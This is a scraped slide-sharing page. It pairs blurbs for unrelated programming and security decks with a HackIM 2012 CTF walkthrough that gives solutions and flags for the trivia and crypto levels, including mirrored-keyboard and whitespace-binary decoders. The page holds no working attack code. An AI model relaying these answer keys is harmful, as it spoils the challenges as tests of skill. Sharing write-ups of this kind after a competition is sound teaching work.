The document provides hints and solutions for various levels of a CTF (capture the flag) competition. It includes 7 sections with 5 levels each related to topics like trivia, cryptography, programming, web exploitation, reverse engineering, log analysis, and forensics. For each level, it describes the challenge, any provided hints, analysis of clues, and the final flag solution. The author encourages readers to try solving the challenges independently before reviewing the writeup.
Python supports multiple programming paradigms, including object-oriented, imperative and functional programming or procedural styles. It features a dynamic type system and automatic memory management and has a large and comprehensive standard library.
A slightly modified version of the original "An introduction to Python for absolute beginners" slides. For credits, please check the second page. I used this presentation for my company's internal Python course.
This document summarizes the basics of memory management in Python. It discusses key concepts like variables, objects, references, and reference counting. It explains how Python uses reference counting with generational garbage collection to manage memory and clean up unused objects. The document also covers potential issues with reference counting like cyclic references and threads, and how the global interpreter lock impacts multi-threading in Python.
The document introduces the Django web framework for Python. It provides an overview of Django's philosophies such as loose coupling, quick development and the DRY principle. It then demonstrates how to build a basic blog application in Django with models, views, templates and URLs. Finally, it discusses additional Django features like generic views and real-world code snippets.
This document provides an overview of the Python programming language, including its history, key features, syntax examples, and common uses. It also discusses how Python can be used under Linux and some potential issues.
This document provides an agenda and overview for a Python training course. The agenda covers key Python topics like dictionaries, conditional statements, loops, functions, modules, input/output, error handling, object-oriented programming and more. The introduction section explains that Python is an interpreted, interactive and object-oriented language well-suited for beginners. It also outlines features like rapid development, automatic memory management and support for procedural and object-oriented programming. The document concludes by explaining Python's core data types including numbers, strings, lists, tuples and dictionaries.
Daniel Greenfeld gave a presentation titled "Intro to Python". The presentation introduced Python and covered 21 cool things that can be done with Python, including running Python anywhere, learning Python quickly, introspecting Python objects, working with strings, lists, generators, sets and dictionaries. The presentation emphasized Python's simplicity, readability, extensibility and how it can be used for a wide variety of tasks.
PHP extensions allow modifying and extending the PHP language. There are different types of extensions including wrapper extensions for interfacing with C libraries, speed and algorithm extensions for optimizing slow code, and Zend extensions for modifying the PHP engine. Writing extensions requires knowledge of C, the PHP internals including zvals and the PHP lifecycle, and using tools like phpize to generate the extension scaffolding. The document provides guidance on setting up a development environment, writing extension code, and testing extensions. It also outlines best practices for extension coding.
This document summarizes Ange Albertini's talk on "Funky file Formats". The talk discusses how files can take on multiple formats by exploiting ambiguities and tolerance in file specifications. Examples are given of files that are valid images, archives, documents, and encrypted files simultaneously. The talk also covers steganography techniques like hiding files within other file formats by manipulating metadata or unused portions of file specifications. Overall, the talk illustrates the concept of "format polymorphism" where single files can masquerade as multiple file types to evade detection or trigger different parser behaviors.
Python is a great programming language. This is a complete tutorial on using this programming language.
These slides are split into two parts, and this is the second part. The other part is at: http://www.slideshare.net/moskytw/programming-with-python-basic.
This document provides an introduction to the Python programming language. It covers basic Python concepts like data types, strings, data structures, classes, methods, exceptions, iterations, generators, and scopes. Python is described as an easy to learn, read, and use dynamic language with a large selection of stable libraries. It is presented as being much easier than bash scripts for building and maintaining complex system infrastructure.
The document discusses several key points about Python:
1. It summarizes praise for Python from programmers and companies like Google, NASA, and CCP Games, highlighting Python's simplicity, compactness, and ability to quickly develop applications.
2. It introduces common Python concepts like strings, lists, sequences, namespaces, polymorphism, and duck typing. Strings can be manipulated using slicing and methods. Lists and other sequences support indexing, slicing, and iteration.
3. Python uses name-based rather than type-based polymorphism through duck typing - an object's capabilities are defined by its methods and properties rather than its class.
DEF CON 27 - SMEA - adventures in smart buttplug penetration testing, by Felipe Prado
The document discusses teledildonics and vulnerabilities in IoT sex toys. It analyzes the Lovense Hush butt plug and its accompanying USB dongle and mobile app. The analysis finds the dongle firmware contains a buggy JSON parser that can be exploited to crash the dongle or potentially execute code. It also finds the Hush and dongle firmware can both be reflashed over serial using their bootloader modes, without authentication. This could allow compromising the devices.
Clone Digger is a tool that detects duplicate code in Python and Java programs. It works at the abstract syntax tree level to find code clones, which are sequences of statements that are similar after replacing variables, functions, constants, etc. Detecting clones is important because it can reduce maintenance costs by identifying code that needs to be refactored or corrected only in one place. Clone Digger can be installed and run from the command line to generate a report of any found clones.
This document discusses Java bytecode fundamentals including:
- Bytecode is composed of one-byte instructions with ~200 opcodes in use
- The javap tool can be used to disassemble classes and view bytecode
- The Java Virtual Machine is stack-based and each thread has a stack frame containing an operand stack and local variables
- Bytecode instructions manipulate the stack and local variables to implement method calls and object initialization
These are the slides for the COSCUP[1] 2013 Hands-on[2], "Learning Python from Data".
They aim to use examples to show the world of Python. I hope they help you with learning Python.
[1] COSCUP: http://coscup.org/
[2] COSCUP Hands-on: http://registrano.com/events/coscup-2013-hands-on-mosky
This document provides an overview of Python for Unix and Linux System Administration by Noah Gift and Jeremy M. Jones. It includes information about related O'Reilly titles, conferences, and online resources from O'Reilly such as oreilly.com and oreillynet.com. It also discusses the Safari Bookshelf online reference library and upcoming O'Reilly conferences.
The document provides guidance on how to write PHP extensions in C. It discusses compiling extensions, writing tests, handling data types, using object-oriented features like classes, and documenting extensions. Key steps include setting up the build environment, adding basic scaffolding, writing tests, getting and returning data, and releasing extensions on PECL. Advanced topics covered are globals, memory management, custom objects, and thread safety. The document aims to explain the full process for writing reliable and well-integrated PHP extensions.
JRuby, Not Just For Hard-Headed Pragmatists Anymore, by Erin Dees
JRuby bills itself as the pragmatic Ruby, the go-to implementation when you need to fit into the Java universe or support a ton of platforms.
Who knew it was also a tool for having fun exploring the realms of computer science?
University of Virginia
cs4414: Operating Systems
http://rust-class.org
Explicit vs. Automatic Memory Management
Garbage Collection, Reference Counting
Rust ownership types
For embedded notes, see: http://rust-class.org/class9-pointers-in-rust.html
Basic Python Programming: Part 01 and Part 02, by Fariz Darari
This document discusses basic Python programming concepts including strings, functions, conditionals, loops, imports and recursion. It begins with examples of printing strings, taking user input, and calculating areas of shapes. It then covers variables and data types, operators, conditional statements, loops, functions, imports, strings, and recursion. Examples are provided throughout to demonstrate each concept.
This document provides an introduction and overview of the Python programming language. It discusses what Python is, its features, applications, and how to install Python on Windows and Linux systems. It also covers Python basics like variables, data types, operators, comments, conditional statements like if/else, and loops like for, while, and nested loops. Examples are provided for key concepts. The document is intended as a beginner tutorial for learning Python.
Random And Dynamic Images Using Python Cgi, by AkramWaseem
This document discusses using Python to generate random and dynamic images through CGI scripts. It begins with an overview and introduction to Python CGI programming and the Python Imaging Library (PIL). It then demonstrates a simple Python CGI script that serves a static image file. Next, it shows a random image script that selects a random image file from a directory. The document also covers using PIL to dynamically generate images and build a script that generates a random gradient image. It concludes by discussing building more advanced dynamic image scripts that accept arguments and graph log files.
Python Workshop - Learn Python the Hard Way, by Utkarsh Sengar
This document provides an introduction to learning Python. It discusses prerequisites for Python, basic Python concepts like variables, data types, operators, conditionals and loops. It also covers functions, files, classes and exceptions handling in Python. The document demonstrates these concepts through examples and exercises learners to practice char frequency counting and Caesar cipher encoding/decoding in Python. It encourages learners to practice more to master the language and provides additional learning resources.
This document introduces Python and discusses its main features and advantages over other languages like Java. Python is described as a high-level, multi-paradigm language with simple yet powerful semantics and a focus on productivity. It discusses how Python code is more concise, readable and fun to write compared to Java, C#, and other languages. Python trusts the programmer and aims to avoid getting in the way. It also has a rich standard library and ecosystem of third-party libraries.
The document provides a walkthrough for 12 levels of the HackIM 2011 capture the flag competition. For each level, it describes any hints or clues, screenshots of relevant information, and step-by-step instructions for solving the level. It also identifies potential pitfalls or distractions in solving each level. The walkthrough is intended to help participants learn how to solve the various challenges of the HackIM competition.
writing self-modifying code and utilizing advanced assembly techniques, by Russell Sanford
This document provides instructions for creating shellcode using only alphanumeric characters. It begins by outlining the plan, which is to use IMUL and XOR instructions to reconstruct bytes not in the alphanumeric range. It then provides a blueprint, explaining how IMUL and XOR can be used to generate needed values. The first code example walks through transforming an existing 24-byte shellcode into an alphanumeric version by pushing and popping values and using XOR to zero registers.
Monitoring a program that monitors computer networks, by Andrey Karpov
There exists the NetXMS project, which is a software product designed to monitor computer systems and networks. It can be used to monitor the whole IT-infrastructure, from SNMP-compatible devices to server software. And I am naturally going to monitor the code of this project with the PVS-Studio analyzer.
A Unicorn Seeking Extraterrestrial Life: Analyzing SETI@home's Source Code, by PVS-Studio
The document analyzes the source code of the SETI@home project using a static code analyzer. The analysis found relatively few errors, indicating high code quality. Some issues discussed include incorrect operator precedence leading to logic errors, empty methods that should return values, pointer dereferencing before checking for null, undefined behavior from negative number shifts, and inefficient string length calls in loops. Overall the review uncovered some minor defects but showed the code is generally well written.
Sphinx autodoc - automated api documentation - PyCon.KR 2015, by Takayuki Shimizukawa
Using the automated documentation feature of Sphinx, you can easily produce extensive documentation for a Python program.
You just write Python function documentation (docstrings); Sphinx organizes them into a document that can be converted to a variety of formats.
In this session, I'll explain a documentation procedure that uses the Sphinx autodoc and autosummary extensions.
The document describes various bugs encountered by the speaker in coding projects. It begins by outlining bugs found in Node.js that were truncating JSON files being downloaded. Through debugging steps like adding log statements and packet sniffing, the issue was traced to an "end" event not properly resuming a stream. Hardware bugs are also discussed, like issues in early Pentium chips. The document concludes with lessons learned, like the importance of fully reproducing bugs and using tools like strace to analyze processes.
Sphinx autodoc - automated API documentation (PyCon APAC 2015 in Taiwan), by Takayuki Shimizukawa
This document discusses Sphinx, an open source documentation generator for Python projects. It describes how Sphinx works with reStructuredText markup and extensions like autodoc to automatically generate API documentation from docstrings in Python source code. Key points include setting up a Sphinx project, using directives like automodule to import modules and generate documentation, and extensions like doctest that allow testing code examples in docstrings.
Archeology for Entertainment, or Checking Microsoft Word 1.1a with PVS-Studio, by Andrey Karpov
The document discusses analyzing the source code of Microsoft Word 1.1a from 1990 using the PVS-Studio static analyzer. Some key findings include:
1. An infinite loop was found in a function due to an unsigned variable being decreased indefinitely.
2. A typo led to an array overrun by accessing beyond the bounds of a 5 element array.
3. Several instances of undefined behavior were discovered where variables were modified between uses.
4. Other issues included uninitialized variables, incorrect format strings in printf, and logical errors in conditions.
Despite the age of the code, the analysis revealed several bugs, demonstrating static analysis remains useful on older code bases.
[Ruxcon 2011] Post Memory Corruption Memory Analysis, by Moabi.com
The document introduces PMCMA, a debugger tool that analyzes memory corruption bugs by forcing processes to fork, overwriting memory locations in the offspring processes, and monitoring execution to map exploitable scenarios. PMCMA aims to provide a roadmap for exploitation by identifying vulnerabilities and possible exploitation techniques like truncating function pointers or exploiting 4-byte aligned memory writes. The tool is available online and has received over 10,000 downloads in its first two months.
Title: Embedded Security Analysis Task: Side Channel Analysis and Fault Injection
Objective:
The objective of this task is to assess your ability to work with Python tools, C programming and computer architecture, and to apply side channel analysis and fault injection techniques to uncover a hidden flag embedded within an ELF file compiled for an STM32 processor. You will use the Lascar and Rainbow tools from Ledger's repository to analyze the binary and retrieve the hidden flag.
Requirements:
1. Proficiency in Python programming.
2. Basic understanding of side channel analysis and fault injection concepts.
3. Familiarity with the ELF file format and embedded systems.
Task Description:
Setup and Familiarization:
1. Clone Ledger's repository containing the Lascar and Rainbow tools.
2. Install the necessary dependencies and set up the environment as per the provided documentation.
3. Review the documentation and examples to understand how the Lascar and Rainbow tools are used for side channel analysis and fault injection.
Binary Analysis:
1. You will be provided with an ELF file compiled for an STM32 processor.
2. Study the provided stubbed source code for the binary to understand its functionality and potential vulnerabilities.
Side Channel Analysis / Fault Injection:
1. Choose a specific side channel analysis technique or fault injection technique based on your analysis of the binary.
2. Implement the chosen technique using the Lascar or Rainbow tools to extract information from the binary.
3. Document your approach, code snippets, and any findings from the side channel analysis.
4. Provide a detailed explanation of your fault injection methodology, along with relevant code snippets and observations.
Flag Retrieval:
1. Apply the insights gained from side channel analysis and fault injection to uncover the hidden secret embedded within the binary.
2. Document the process you followed to successfully retrieve the secret.
3. Provide the extracted secret as proof of completion.
Evaluation Criteria:
You will be evaluated based on the following criteria:
1. Understanding of side channel analysis and fault injection concepts.
2. Proficiency in understanding the assignment and applying conceptual knowledge in practice.
3. Explanation of the approach taken.
4. Successful retrieval of the hidden flag.
Submit all scripts, analysis, images and documentation in the form of a zip file directly to Cypherock.
AI Machine Learning Complete Course: for PHP & Python Devs, by Amr Shawqy
Course Discounted Link:
https://www.udemy.com/ai-machine-learning-complete-course/?couponCode=SLIDESHAREDISCOUNT
Become an AI & Machine Learning developer, one of employers' most requested skills for 2018/2019!
Add value to your solutions and products; it is time to start using AI & Machine Learning now!
This course is different from any other AI or Machine Learning course: it requires no prior knowledge of AI or Machine Learning, and you will be able to have your own AI Machine Learning application up and running right after the course.
This course is straightforward, practical, and gives you all you need to start your career in Machine Learning and Data Science. If you are a developer, programmer, technical student, manager or team leader, and you have not explored AI and Machine Learning before, this course is the best, most exciting, and most complete course for you.
Applications that identify the language of a string, identify colors, identify human actions (like jump, sleep, anger, sadness, etc.) in a video, or identify whether a tweet or a Facebook post is positive or negative are all examples of what you can build in this course, all explained so that you can do it yourself during the step-by-step journey in this course.
This course will make all AI concepts, terminology, and approaches clear for you, so you understand how everything around you works, and takes you through a series of very interesting hands-on, step-by-step examples of how to build AI applications.
The following topics are covered:
- AI
- Rule & Logic Based AI
- Machine Learning
- Machine Learning Types (Supervised, Unsupervised, Reinforced, etc.)
- Machine Learning Algorithms
- Neural Networks & Deep Neural Networks
- Deep Learning
- PHP Step by Step Examples
- Python Step by Step Examples
- Language Detection
- Color Detection
- Human Actions Identification in Videos
- General String Classification
- Handling numerical data, string data, image data, voice data, and video data.
- PHP-ML
- scikit-learn
- numpy
- TensorFlow
- TensorFlow Hub
- Neural Networks Math Step by Step
- And Much More!
A Replay Approach to Software ValidationJames Pascoe
The document discusses a replay approach to software validation using regular expressions in C++11 and Python. It describes replaying log files to recreate events and find bugs faster. It also explains how regular expressions can be used to parse log files and validate replayed logs by comparing them to the originals. Regular expressions in C++11 and Python are compatible, which is useful for cross-language validation tools.
Sphinx autodoc - automated API documentation (EuroPython 2015 in Bilbao)Takayuki Shimizukawa
Takayuki Shimizukawa discusses how to generate documentation from Python source code using Sphinx. He introduces Sphinx and its extensions for automating documentation generation from docstrings. He demonstrates setting up a Sphinx project and configuring extensions like autodoc, autosummary, and doctest to generate API documentation and test code examples. The presentation emphasizes best practices for writing informative docstrings and code examples to fully document modules and functions.
Post exploitation techniques on OSX and Iphone, EuSecWest 2009Vincenzo Iozzo
The document discusses post-exploitation techniques on macOS and iOS. It summarizes a technique called "userland-exec" that allows executing binaries on macOS without involving the kernel. It then describes efforts to port this technique to iOS by injecting libraries instead of binaries due to code signing restrictions. The author demonstrates injecting an unsigned library into a process on a factory iPhone by hijacking the dlopen function and loading the library from memory. This technique paves the way for developing advanced payloads like Meterpreter on unmodified iOS devices.
XCon 2014 => http://xcon.xfocus.org/
In the past was quite common to exploit heap / pool manager vulnerabilities attacking its internal linked structures. However current memory management improve a lot and at current date it is quite ineffective to attack heap in this way. But still those techniques come into hand when we start to looking at linked structures widespread throughout kernel that are unfortunately not hardened enough.
In this presentation we will examine power of these vulnerabilities by famous example “CVE – 2013 - 3660”. Showing bypass on ‘lazy’ assertions of _LIST_ENTRY, present exploitation after party and teleport to kernel.
Shellcode Disassembling - Reverse EngineeringSumutiu Marius
This document provides a basic guide to reverse engineering Linux x86 shellcode. It summarizes reversing two sample shellcodes: 1) A simple shellcode that reads the /etc/passwd file, and 2) An XOR encrypted shellcode that launches a new ksh shell with root privileges. It explains breaking down the shellcode using a debugger to understand what it is doing by examining registers, system calls and related functions. The goal is to understand how the shellcode works rather than just trusting its described purpose.
Windows Kernel Exploitation : This Time Font hunt you down in 4 bytesPeter Hlavaty
The document discusses exploiting TrueType font (TTF) vulnerabilities to achieve kernel code execution on Windows systems. It begins by describing the discovery of exploitable bugs in a TTF fuzzer. Despite mitigations like KASLR, NX, SMAP, and CFG, the researchers were able to bypass these protections through techniques like controlled overflows, abusing plain kernel structures, and function-driven attacks. They show how to leverage wild overflows, control kernel memory layout, and hijack control flow to achieve arbitrary code execution. The document emphasizes that OS design weaknesses allow bypassing modern defenses through clever bug chaining and memory manipulation.
Infrastructure as code might be literally impossible part 2ice799
The document discusses various issues with infrastructure as code including complexities that arise from software licenses, bugs, and inconsistencies across tools and platforms. Specific examples covered include problems with SSL and APT package management on Debian/Ubuntu, Linux networking configuration difficulties, and inconsistencies in Python packaging related to naming conventions for packages containing hyphens, underscores, or periods. Potential causes discussed include legacy code, lack of time for thorough testing and bug fixing, and economic pressures against developing fully working software systems.
GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024Neo4j
Neha Bajwa, Vice President of Product Marketing, Neo4j
Join us as we explore breakthrough innovations enabled by interconnected data and AI. Discover firsthand how organizations use relationships in data to uncover contextual insights and solve our most pressing challenges – from optimizing supply chains, detecting fraud, and improving customer experiences to accelerating drug discoveries.
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
How to Get CNIC Information System with Paksim Ga.pptxdanishmna97
Pakdata Cf is a groundbreaking system designed to streamline and facilitate access to CNIC information. This innovative platform leverages advanced technology to provide users with efficient and secure access to their CNIC details.
Maruthi Prithivirajan, Head of ASEAN & IN Solution Architecture, Neo4j
Get an inside look at the latest Neo4j innovations that enable relationship-driven intelligence at scale. Learn more about the newest cloud integrations and product enhancements that make Neo4j an essential choice for developers building apps with interconnected data and generative AI.
In his public lecture, Christian Timmerer provides insights into the fascinating history of video streaming, starting from its humble beginnings before YouTube to the groundbreaking technologies that now dominate platforms like Netflix and ORF ON. Timmerer also presents provocative contributions of his own that have significantly influenced the industry. He concludes by looking at future challenges and invites the audience to join in a discussion.
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
TrustArc Webinar - 2024 Global Privacy SurveyTrustArc
How does your privacy program stack up against your peers? What challenges are privacy teams tackling and prioritizing in 2024?
In the fifth annual Global Privacy Benchmarks Survey, we asked over 1,800 global privacy professionals and business executives to share their perspectives on the current state of privacy inside and outside of their organizations. This year’s report focused on emerging areas of importance for privacy and compliance professionals, including considerations and implications of Artificial Intelligence (AI) technologies, building brand trust, and different approaches for achieving higher privacy competence scores.
See how organizational priorities and strategic approaches to data security and privacy are evolving around the globe.
This webinar will review:
- The top 10 privacy insights from the fifth annual Global Privacy Benchmarks Survey
- The top challenges for privacy leaders, practitioners, and organizations in 2024
- Key themes to consider in developing and maintaining your privacy program
Removing Uninteresting Bytes in Software FuzzingAftab Hussain
Imagine a world where software fuzzing, the process of mutating bytes in test seeds to uncover hidden and erroneous program behaviors, becomes faster and more effective. A lot depends on the initial seeds, which can significantly dictate the trajectory of a fuzzing campaign, particularly in terms of how long it takes to uncover interesting behaviour in your code. We introduce DIAR, a technique designed to speedup fuzzing campaigns by pinpointing and eliminating those uninteresting bytes in the seeds. Picture this: instead of wasting valuable resources on meaningless mutations in large, bloated seeds, DIAR removes the unnecessary bytes, streamlining the entire process.
In this work, we equipped AFL, a popular fuzzer, with DIAR and examined two critical Linux libraries -- Libxml's xmllint, a tool for parsing xml documents, and Binutil's readelf, an essential debugging and security analysis command-line tool used to display detailed information about ELF (Executable and Linkable Format). Our preliminary results show that AFL+DIAR does not only discover new paths more quickly but also achieves higher coverage overall. This work thus showcases how starting with lean and optimized seeds can lead to faster, more comprehensive fuzzing campaigns -- and DIAR helps you find such seeds.
- These are slides of the talk given at IEEE International Conference on Software Testing Verification and Validation Workshop, ICSTW 2022.
GraphRAG for Life Science to increase LLM accuracyTomaz Bratanic
GraphRAG for life science domain, where you retriever information from biomedical knowledge graphs using LLMs to increase the accuracy and performance of generated answers
GraphRAG for Life Science to increase LLM accuracy
HackIM 2012 CTF Walkthrough
My Acknowledgements To:
Anant Shrivastava (infinity), Prashant KV (kvbhai), Dhanesh K (danny),
Riyaz Walikar (karniv0re), Murtuja Bharmal (void), Aseem Jakhar (@),
Rahul Sasi (FB1H2S), Pardhasaradhi CH (pardhu), Chaithu Rk (Antagonist),
Amol Naik (AMol NAik), Prince Boonlia (boonlia), Atul Alex Cherian
(Aodrulez), Pushkar Pashupat (push), Abhisek Datta (adatta), Ajit Hatti
(adh), Bipin Upadhyay (om), Hemanshu Asolia (h3m4n), Shannon Morse
(snubs) & Team from Hak5 - Trust Your Technolust
A few cheeky lines to gear up the CTF thrill:
- Kitne level the? 35, sardaar. (How many levels were there? 35, sardaar.)
- A computer, plenty of time, lots of patience and a challenging CTF, what else does a
hacker need to be happy?
- Don't cry at the beginning of the CTF. Cry at the end of the CTF.
- Unfortunately, no one can be told what the CTF is. You have to see it for yourself
- I know why you're playing CTF, Neo. I know what you've been doing... why you hardly
sleep, why you live alone and why night after night, you sit by your computer. You're
looking for the flag. I know because I was once looking for the same thing. I was looking
for an answer. It's the question that drives us, Neo. It's the question that brought you here.
You know the question, just as I did.
Before everything else, a word, in fact a request: kindly avoid going
through this writeup before you have attempted the levels with your wildest
ideas, your weirdest assumptions, your hottest tools, your craziest Einstein
formula, or a logic that never fails.
Brief Overview of CTF Layout:
The CTF was divided into 7 sections, each with 5 levels of challenges.
1. Trivia Levels: Brain-teasers/Riddles
2. Crypto Levels: Mystified ciphers/Substitutions
3. Programming Levels: Mathematical logic/Hash cracking
4. Web Levels: Redirection/Injection
5. Reverse Engineering Levels: PE/APK/Memory dump
6. Log Analysis: Analysing pcap and scanner-generated logs
7. Forensics Level: Incident analysis
Trivia Levels
Trivia Level 1
Official Hint: N/A
Page Source: Nothing Interesting
Description: This operating system also refers to a 1982 science fiction film, a board game, and
a song off the Prodigy B-Side "What Evil Lurks"
Analysis: A quick Google search for “sci-fi movie list 1982” returned Android (the 1982 film) as
the first result.
Flag: android
Trivia Level 2
Official Hint: N/A
Page Source: Nothing Interesting
Description: This fictional IPv4 packet header field was proposed in RFC 3514 as a means for
identifying packets with malicious intent.
Analysis: Google search with the keyword “fictional IPv4 packet header field” revealed the flag.
Flag: evil bit
Trivia Level 3
Official Hint: N/A
Page Source: Nothing Interesting
Description: This humorous RFC of the Internet Engineering Task Force describes a
communication and control protocol suite designed for allowing infinite numbers of monkeys
with infinite numbers of typewriters to produce the entire works of William Shakespeare.
Analysis: Google search with the keyword “communication and control protocol suite designed
for allowing infinite numbers of monkeys” revealed the flag.
Flag: RFC 2795
Trivia Level 4
Official Hint: N/A
Page Source: Nothing Interesting
Description: Metasploit was originally coded for what purpose?
Analysis: I remember going through the book “Metasploit Toolkit”, where it was mentioned
that Metasploit originally started as a network security game.
Flag: game
Trivia Level 5
Official Hint: N/A
Page Source: Nothing Interesting
Description: Released on April 1st 2003, this esoteric programming language uses spaces, tabs
and linefeeds to compose commands.
Analysis: Google search with the keyword “April 1st 2003 programming language” revealed the
flag as whitespace.
Flag: whitespace
Crypto Levels
Crypto Level 1: Ulta Pulta
Official Hint: poiuyt
Page Source: <!-- <img src="http://www.instablogsimages.com/images/2009/09/14/recycled-keyboard-computer-mirror1_VXLbh_24429.jpg"> -->
Description: Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy.
ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik
xwy qailki Oexjwok, 2 Ceaa Glyik
Analysis: The page source revealed an image of a mirrored keyboard. Mapping each character of
the given string to the key at the mirror position of the same row (right side swapped with the
left, and vice versa) revealed the flag.
Keyboard Mapping (each key swaps with its mirror image on the same row):
3 == 0
- == 2
. == ,
q == p
a == l
z == m
Flag: Windows 2000 already contains features such as the human discipline component,
where the PC can send an electric shock through the keyboard if the human does
something that does not please Windows. - Bill Gates
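The mapping above, written out as a decoder. This is an added example and not part of the original writeup; the row strings are an assumption about the US QWERTY layout that the six pairs listed on the page imply, and the ciphertext is the level description copied from above. Because every key swaps with its mirror partner, the mapping is an involution: the same function encodes and decodes.

```python
# Added example: decoder for the mirrored-keyboard substitution of Crypto Level 1.
# Each key is swapped with the key at the mirror position of the same row, so the
# mapping is an involution and mirror_decode() both encodes and decodes.
# KEY_ROWS is an assumption (US QWERTY) consistent with the pairs on the page:
# 3<->0, -<->2, .<->,, q<->p, a<->l, z<->m.

KEY_ROWS = [
    "1234567890-=",   # 1<->=, 2<->-, 3<->0, 4<->9, 5<->8, 6<->7
    "qwertyuiop",     # q<->p, w<->o, e<->i, r<->u, t<->y
    "asdfghjkl",      # a<->l, s<->k, d<->j, f<->h, g stays put
    "zxcvbnm",        # z<->m, x<->n, c<->b, v stays put
    ",.",             # , <-> .
]


def build_mirror_map() -> dict:
    """Map every key (both cases) to its mirror image on the same row."""
    table = {}
    for row in KEY_ROWS:
        for i, ch in enumerate(row):
            partner = row[len(row) - 1 - i]
            table[ch] = partner
            table[ch.upper()] = partner.upper()
    return table


def mirror_decode(text: str) -> str:
    """Apply the mirror substitution; characters not on a keyboard row pass through."""
    table = build_mirror_map()
    return "".join(table.get(c, c) for c in text)


# Ciphertext from the level description on the page.
CIPHERTEXT = (
    "Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. "
    "ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik "
    "kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik"
)

if __name__ == "__main__":
    print(mirror_decode(CIPHERTEXT))
```

Running it prints the Bill Gates quote given as the flag; applying mirror_decode twice returns the input unchanged, which is a quick sanity check that the row strings are consistent.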
Crypto Level 2: White Noise
Official Hint: Follow the White Rabbit: P (by spnow)
Page Source: <!-- md5sum: b80a5ce8b0c6c57a0258f34dd5905970 -->
Description: shhhkoinahihai
Analysis:
First Attempt (leet way):
I went through the Wikipedia article on Whitespace (the programming language) and got the idea that
the given whitespace consists of tabs and spaces, which could be replaced by 1 and 0.
1. Copied the whitespace into gedit (text editor).
2. Replaced the tabs with 1 and the spaces with 0.
3. Got a sequence of 0s and 1s.
4. This binary sequence now needed to be converted into something meaningful, so I googled for
“binary to text translator” and found an online tool at http://home.paulschou.net/tools/xlate/
5. Translated the binary sequence, but to my surprise I couldn’t get any meaningful
information. Where had I gone wrong?
Second Attempt (leet way):
6. After some thought I concluded: how about replacing tabs with 0 and spaces with 1?
7. That gave a new sequence, and new expectations.
8. Again I used the same binary to text translator, and voila!!! There was our flag.
Alternate Method:
The above method is rather laborious.
We can solve the same problem in this alternate way:
1. Copy the whitespace into gedit (text editor) and save it.
2. Linux has a utility called “tr” to translate characters.
3. Type the following at the terminal (note the space after \t, so that tabs become 0 and spaces become 1):
cat whitespace.txt | tr "\t " "01"
4. There is our binary sequence; again we can paste it into the binary to text translator to
get the flag.
Flag: Error Message: Your Password Must Be at Least 18770 Characters and Cannot
Repeat Any of Your Previous 30689 Passwords - MS KB 276304
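The two attempts above differ only in which character stands for 0 and which for 1. As an added example (not the author's code, and not the level's actual data, which is not reproduced on the page), the decoder below reads the tab/space stream directly and tries both polarities, keeping the one that yields printable ASCII. The sample stego text is constructed here from a known message so the block runs offline.

```python
# Added example: decode a run of tabs and spaces (the "white noise" of Crypto Level 2)
# into bytes, trying both bit polarities. SAMPLE is constructed for the demo.
import string

PRINTABLE = set(string.printable)


def bits_to_text(bits: str) -> str:
    """Pack a string of '0'/'1' into 8-bit characters, MSB first; a trailing partial byte is dropped."""
    usable = len(bits) - len(bits) % 8
    return "".join(chr(int(bits[i:i + 8], 2)) for i in range(0, usable, 8))


def decode_whitespace(blob: str, tab_is: str = "0") -> str:
    """Map tab -> tab_is and space -> the other bit; every other character is ignored."""
    space_is = "1" if tab_is == "0" else "0"
    bits = "".join(tab_is if c == "\t" else space_is for c in blob if c in "\t ")
    return bits_to_text(bits)


def decode_either_polarity(blob: str) -> str:
    """Try tab=0 first (the polarity that worked on the page), then tab=1.

    The wrong polarity yields the bitwise complement of every byte, which for an
    ASCII message always has the high bit set, so the printable check is decisive."""
    for tab_is in ("0", "1"):
        text = decode_whitespace(blob, tab_is)
        if text and all(c in PRINTABLE for c in text):
            return text
    raise ValueError("neither polarity produced printable ASCII")


def encode_whitespace(text: str, tab_is: str = "0") -> str:
    """Inverse of decode_whitespace; used only to build the constructed sample."""
    bits = "".join(format(ord(c), "08b") for c in text)
    return "".join("\t" if b == tab_is else " " for b in bits)


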